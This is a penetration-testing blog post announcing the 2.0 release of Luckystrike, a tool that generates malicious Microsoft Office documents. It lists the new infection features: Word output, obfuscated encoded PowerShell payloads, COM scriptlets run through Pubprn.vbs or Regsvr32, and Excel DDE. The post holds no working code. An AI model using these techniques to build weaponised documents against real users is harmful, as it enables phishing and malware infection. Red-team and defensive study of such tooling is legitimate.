UPDATE: Luckystrike 2.0!

Type pentestit
Reporter Black
Modified 2017-07-24T20:24:28


PenTestIT RSS Feed

My first post regarding this malicious Microsoft Office document generator was about an older version. However a few hours ago, an update was released - Luckystrike 2.0! Major highlights for this awesome release include full support for Microsoft Word in addition to a new COM scriptlet payload and Excel DDE infection support. Along with this, support for Invoke-Obfuscation is inbuilt!

Luckystrike 2.0

What is Luckystrike?

> Luckystrike is an open source script that helps you create malicious Microsoft Office documents using PowerShell’s ability to interface with COM objects.

Changes made to Luckystrike 2.0:

  1. Full support for Microsoft Word output (.doc), as well as Word-based template storage.
  2. Support for Invoke-Obfuscation of PowerShell based payloads as well as PowerShell Shell commands (e.g. powershell -nop -enc …)
  3. New Payload Type: COM Scriptlets. Receives a URL that points to your scriptlet and can fire it via the following Infection Types (based on amazing @subTee research):
    1. Pubprn.vbs - Example
    2. Regsrv32 - Example
  4. Excel DDE Infection Type added: Research. Note that your first Shell Command payload word is the command run by DDE.
  5. A truckload of bug fixes!
  6. The Luckystrike-API switch allows it to be scriptable. See the Pester script for examples.
  7. The wiki has been updated to make it easy to get assistance.

Another relevant update is that the author has switched his GitHub repository and hence you will not see an upgrade prompt with the older version. If you have made customizations which you would like to keep, let the old repository be and check out the new code in a different directory. However, if you want to get the goodness, without checking out the new directory but using the inbuilt updater, follow the instructions that the author mentions here. Please read the Wiki before you install this new version.

Download Luckystrike 2.0:

Get Luckystrike 2.0 from it's new GIT repository here.

The post UPDATE: Luckystrike 2.0! appeared first on PenTestIT.